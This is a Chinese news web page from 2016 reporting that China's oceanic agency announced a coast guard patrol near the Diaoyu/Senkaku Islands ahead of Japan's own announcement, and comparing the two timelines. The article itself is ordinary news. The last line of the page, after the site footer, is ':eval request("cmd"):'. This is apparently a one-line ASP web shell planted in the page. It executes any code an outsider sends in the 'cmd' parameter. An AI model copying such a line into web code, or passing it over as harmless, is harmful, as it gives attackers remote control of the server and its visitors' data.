大陆新闻

中国首次主动抢先发表巡航钓鱼岛消息

时间:2016-9-11 23:44:08  作者:  来源:  查看:144  评论:0
内容摘要:      中国政府在钓鱼岛的巡航问题上正在采取积极主动的信息发表措施。今日上午,中国国家海洋局首次抢在日本政府之前,公布了海警船进入尖阁列岛的消息。  今日上午10时40分许(北京时间9时40分许),中国国家海洋局网站公布了中国海警船“...
      中国政府在钓鱼岛的巡航问题上正在采取积极主动的信息发表措施。今日上午,中国国家海洋局首次抢在日本政府之前,公布了海警船进入尖阁列岛的消息。

  今日上午10时40分许(北京时间9时40分许),中国国家海洋局网站公布了中国海警船“海警2401、2337、2102、31101舰船编队在中国钓鱼岛领海内巡航”的消息。但是,日本海上保安厅在中午12时30分,才发表“中国4艘海警船侵入日本领海”的消息,比中国国家海洋局发表的消息迟了近2个小时。

  根据日本海上保安厅第11管区海上保安本部发表的消息说,中国4艘海警船是在上午10时20分至40分之间,从钓鱼岛的西北方向海域“侵入日本领海”,在11时50分至12时10分之间,从钓鱼岛的西南方向离开“日本领海”,在日本领海的航行时间约为1个半小时,比以前的2小时的固定巡航时间缩短了半小时。

  从日本海上保安厅公布的时间来看,中国国家海洋局是在4艘海警船进入尖阁列岛12海里海域之后,就立即发表了巡航的消息。但是,日本海上保安厅是在确认中国海警船离开“日本领海”之后,才发表消息。这一动向表明,中国在尖阁列岛巡航问题上,今后将采取主动公布消息的做法,以避免在主权问题上的舆论被动。

中国首次主动抢先发表巡航钓鱼岛消息


中国首次主动抢先发表巡航钓鱼岛消息
世保盟微信公衆号
微信掃一掃二維碼
 
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):